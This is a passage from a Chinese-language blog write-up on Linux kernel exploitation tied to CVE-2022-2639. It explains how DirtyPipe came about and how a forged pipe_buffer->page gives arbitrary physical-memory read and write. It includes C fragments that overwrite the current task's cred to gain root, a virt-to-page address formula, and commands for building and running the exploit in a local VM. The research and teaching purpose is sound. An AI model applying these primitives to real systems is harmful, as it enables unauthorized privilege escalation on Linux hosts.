4.9~5.0：commit 241699cd72a8 “new iov_iter flavour: pipe-backed” (Linux 4.9, 2016) 引入了两个函数，其中一个是 copy_page_to_iter_pipe()，此时也没有对 pipe_buffer->flags 进行初始化，不过没有问题，因为 can_merge 参数还在 fops 中。

5.0~5.8：commit 01e7187b4119 “pipe: stop using ->can_merge” (Linux 5.0, 2019) 移除了 pipe_buf_operations 中的 can_merge 字段，还增加了一个函数 pipe_buf_can_merge()，可能是发现除了匿名管道外，所有的管道都不支持merge，所以只要判断一下fops是不是anon_pipe_buf_ops就能判断是否可以merge。

static bool pipe_buf_can_merge(struct pipe_buffer *buf)
{
	return buf->ops == &anon_pipe_buf_ops;
}

5.8~5.16：commit f6dd975583bd “pipe: merge anon_pipe_buf*_ops” (Linux 5.8, 2020) 将 merge 操作的判断加到了 pipe_buffer->flags 中，导致 DirtyPipe 漏洞。

利用：在 kernel >= 5.8 中需要修改 pipe buffer 中 splice 页的flag |= PIPE_BUF_FLAG_CAN_MERGE即可（有能力可以顺便把offset和len改成0，这样就能从文件的开头开始写）；在 kernel < 5.8 中，需要先leak一下pipe_buffer中的anon_pipe_ops，然后将 splice 页的的ops改为anon_pipe_ops（因为<5.8版本中能否merge是看ops的）（有能力依然可以顺便把offset和len改成0）。老版本中虽然用到了内核地址，但是不涉及偏移计算，所以也不需要进行版本适配。

3-2. 利用 `pipe_buffer` 构造任意读写

主要内容：介绍一种新的利用方法，伪造 pipe_buffer->page 来构造任意读写。能够读写物理地址空间，包括内核、敏感对象 task_struct 或 cred 对象、kernel image 中可写的页。

pipe_buffer介绍：由pipe_inode_info结构来管理pipe，结构指针pipe_inode_info->bufs指向 pipe_buffer，n个（默认16个）pipe_buffer 形成一个环形，由pipe_inode_info->head 和 pipe_inode_info->tail 分别指向可读可写的位置。pipe_buffer 位于 memcg slab cache，分配大小为 n * sizeof(struct pipe_buffer)，其中n是2的幂数，参见 CVE-2021-4154 可以通过 fcntl(pipe_fd, F_SETPIPE_SZ, PAGE_SIZE * n) 设置n的大小。

struct pipe_buffer { 
       struct page *page; 			// 指向物理内存，也即 struct page 对象，所有的page对象都保存在一个叫做 `vmemmap_base` 的单链表中。当写入pipe时，内核使用 new page 来保存数据，该page可以splice 到其他pipe，或者通过pipe将内容从读端读取出来。
       unsigned int offset, len; 
       const struct pipe_buf_operations *ops; 	// 常用方法，覆盖后可用于劫持控制流
       unsigned int flags; 
       unsigned long private; 
}; 

pipe_write()：往pipe写时，内核会分配 new page 来存储写入的数据；该page可以进行splice，也可以从读端读取。

static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from) 
{ 
	... 
       for (;;) { 
	...
              if (!pipe_full(head, pipe->tail, pipe->max_usage)) { 
	...
                     struct page *page = pipe->tmp_page; 
	...
                     if (!page) { 
                            page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);	// [1] 分配 new page 物理页
                            if (unlikely(!page)) { 
                                   ret = ret ? : -ENOMEM; 
                                   break; 
                            } 
                            pipe->tmp_page = page; 
                     } 
	...
/* Insert it into the buffer array */ 
buf = &pipe->bufs[head & mask]; 
buf->page = page; 					// [2] new page 保存到 pipe_buffer->page
buf->ops = &anon_pipe_buf_ops; 
buf->offset = 0; 
buf->len = 0; 
	...
copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); 	// [3] 拷贝用户数据

利用思路：假设我们能够覆写 pipe_buffer->page 指向堆内存（已知某个堆对象的地址，直接算术运算），或者指向内核image（不知道目标对象的地址，需要进行爆破）。

3-2-1. 已知目标对象的地址

假设：假设我们能够泄露某个page地址，并且已知目标对象的地址，我需要去篡改目标对象。如果我们能泄露某个 struct page 指针，我们可以计算出 vmemmap_base 地址、计算 heap base 在物理页上的加载点（内核堆也位于物理页上，但是堆基址未知，后面会介绍到堆基址相对于第1个page的偏移是固定的）、重复递增并重写page指针来寻找堆上的目标对象。

示例：假设我们泄露的 struct page 地址为 0xffffebea044d9f00，目标虚拟地址为 0xffff98784d431d00。通过计算 0xfffffffff0000000 & 0xffffebea044d9f00 可知 vmemmap_base 地址 0xffffebea00000000。

问题：我们如何计算heap上的目标对象所在的 page 呢？ struct page = vmemmap + offset ，也就是这个 offset 是什么呢？由于 vmemmap array 直接和物理内存相关，且 heap base 并非完全（物理上）随机化的，所以可以采用以下公式计算 target_object page。

target_object page = vmemmap_base + ((0x100000000 >> 12) * 0x40) + (((target_object & 0xffffffff) >> 12) * 0x40)

解释：堆基址并非随机化的，它相对于 vmemmap_base 的偏移是固定的 0x100000000，移位12 表示内存中该page的下标，例如，0x100000000 对应内存中的 0x100000000 >> 12 page。乘以 0x40 表示在 vmemmap_base array 中的字节下标（根据成员的size，0x40就是struct page 的大小），例如 int x[N]; int y = x[3]; 就会获得值 &x + (3 * sizeof(int))。

如果我们设置好 pipe_buffer->page，就能读写目标对象所在的page，注意，目标对象有可能占据多个page。 1-indexing the target object's page

代码：以下代码设置 pipe_buffer->page 指向当前任务的 cred 对象（假设已知cred对象的地址）所在的page，覆写为0提权。

uint64_t cred_page = virt_to_page(target_obj, vbase); 			// virt_to_page() 就是以上这个公式的实现
uint64_t cred_off = (target_obj & 0xfff); 
 
pbuf->page = (long *)cred_page; 
pbuf->offset = cred_off + 0x4; 
pbuf->len = 0; 
pbuf->ops = (long *)FAKE_OPS; 
pbuf->flags = PIPE_BUF_FLAG_CAN_MERGE; 
pbuf->private = 0; 
... 
write(dest_pipe.wr, zeroes, 0x20); 

3-2-2. 目标对象的地址未知

假设：假设目标对象的地址未知，我们需要先搜索 task_struct 和 cred 地址。可以先利用 prctl() 将当前任务的 task_struct->comm 设置为特定字符串，便于进行搜索定位。

方法：循环遍历i，将 pipe_buffer->page 设置为 (vmemmap_base + ((0x100000000 >> 12) * 0x40)) + (0x40 * i)，不断读取内存，直到找到当前任务的 task_struct，这样就能泄露 cred 地址。前提是我们需要多次触发漏洞，多次堆喷伪造 pipe_buffer。

避免重新分配：假设已知某个对象的地址，但并非目标对象的地址。例如，我们已知重叠的 msg_msgseg 和 pipe_buffer 地址，但是不知道目标 cred 对象的地址。我们可以通过某个 overwrite pipe_buffer 重复覆写某个 seeker pipe_buffer：

（1）计算seeker pipe_buffer 所在的 page 地址；
（2）创建另一个overwrite pipe_buffer；
（3）触发UAF，并向 seeker pipe_buffer->page 所在的page进行写；
（4）用 seeker pipe 作为 source，overwrite pipe 作为 dest，来调用 tee()。

现在，我们就有可靠的方法来覆写 seeker pipe_buffer，不需要重复堆喷和触发UAF，利用代码如下：

void set_new_pipe_bufs_overwrite(char *buf, struct pipe_struct *overwrite, 
                                 char *obj_in_page, struct pipe_buffer *pbuf, 
                                 uint64_t new_page, uint32_t len, int *tail) 
{ 
    if(read(overwrite->read, buf, PAGE_SIZE) != PAGE_SIZE) 		// [1] read() 设置 overwriter 的 pipe_inode_info->tmp_page 指向 seeker `pipe_buffer` 对象所在的 page, 之后我们就能直接写入该 tmp_page
        error_out("read overwriter_pipe[0]"); 
 
    struct pipe_buffer *setpbuf = (struct pipe_buffer *) obj_in_page; 	// [2] 构造 new `pipe_buffer`
    setpbuf += (*tail) % 8; 
    (*tail)++;
    *setpbuf = *pbuf;
    setpbuf->page = (void *) new_page; 
    setpbuf->len = len; 
 
    if (write(overwrite->write, buf, PAGE_SIZE) != PAGE_SIZE) 	// [3] 通过 overwrite pipe 往 seeker `pipe_buffer` 写。内核会将指定内容写到 overwrite pipe 的 pipe_inode_info->tmp_page 指向的物理页
        error_out("write overwriter_pipe[1]"); 
} 

直接读写内核变量？：假设我们的目标是内核中某个变量，例如，我们不想通过遍历heap，而是通过遍历 init_task 来找到当前task 和 cred 对象，能否通过泄露内核基址（例如 pipe_buffer->ops）然后利用virt_to_page() 公式呢？也即通过内核基址来计算page下标，然后伪造 pipe_buffer->page进行任意读。

由于在x86系统上开启了KASLR，显然不可行。CONFIG_RANDOMIZE_BASE选项会单独随机化物理加载地址和虚拟基地址，不能通过其中一个地址得到另一个地址。

3-3. 常用调试命令

# ssh连接与测试
$ ssh -p 10021 hi@localhost             # password: lol
$ ./exploit

# 编译exp 				注意libmnl不支持静态编译，加 -static 就会报错; 加 -lrt 表示实时库
$ gcc exploit.c -o exploit -static -no-pie -s

# scp 传文件
$ scp -P 10021 ./exploit hi@localhost:/home/hi      # 传文件
$ scp -P 10021 hi@localhost:/home/hi/trace.txt ./   # 下载文件
$ scp -P 10021 ./exploit.c ./get_root.c ./exploit ./get_root  hi@localhost:/home/hi

参考

CVE-2022-2639 openvswitch LPE 漏洞分析

CVE-2022-0185分析及利用与 pipe新原语思考与实践

【kernel exploit】CVE-2022-0847 Dirty Pipe 漏洞分析与利用

pipe_buffer arbitrary read write —— 利用 pipe_buffer 进行任意地址读写

文档信息

本文作者：bsauce
本文链接：https://bsauce.github.io/2022/11/24/CVE-2022-2639/
版权声明：自由转载-非商用-非衍生-保持署名（创意共享3.0许可证）

bsauce

【kernel exploit】CVE-2022-2639 openvswitch模块kmalloc-0x10000堆溢出利用

【kernel exploit】CVE-2022-2639 openvswitch模块kmalloc-0x10000堆溢出利用（pipe_buffer任意文件写技术）

1. 漏洞分析

1-1. 代码分析

1-2. 溢出可行性

1-3. 填充action数据-增大溢出长度

2. 漏洞利用

2-1. 页喷射

2-2. 堆布局

2-3. 泄露堆地址

2-4. 任意释放

2-5. 类似DirtyPipe利用

2-6. 测试

3. 补充

3-1. DirtyPipe原理

3-2. 利用 `pipe_buffer` 构造任意读写

3-2-1. 已知目标对象的地址

3-2-2. 目标对象的地址未知

3-3. 常用调试命令

参考

文档信息

Search

Table of Contents

【kernel exploit】CVE-2022-2639 openvswitch模块kmalloc-0x10000堆溢出利用

【kernel exploit】CVE-2022-2639 openvswitch模块kmalloc-0x10000堆溢出利用（pipe_buffer任意文件写技术）

1. 漏洞分析

1-1. 代码分析

1-2. 溢出可行性

1-3. 填充action数据-增大溢出长度

2. 漏洞利用

2-1. 页喷射

2-2. 堆布局

2-3. 泄露堆地址

2-4. 任意释放

2-5. 类似DirtyPipe利用

2-6. 测试

3. 补充

3-1. DirtyPipe原理

3-2. 利用 pipe_buffer 构造任意读写

3-2-1. 已知目标对象的地址

3-2-2. 目标对象的地址未知

3-3. 常用调试命令

参考

文档信息

Search

Table of Contents

3-2. 利用 `pipe_buffer` 构造任意读写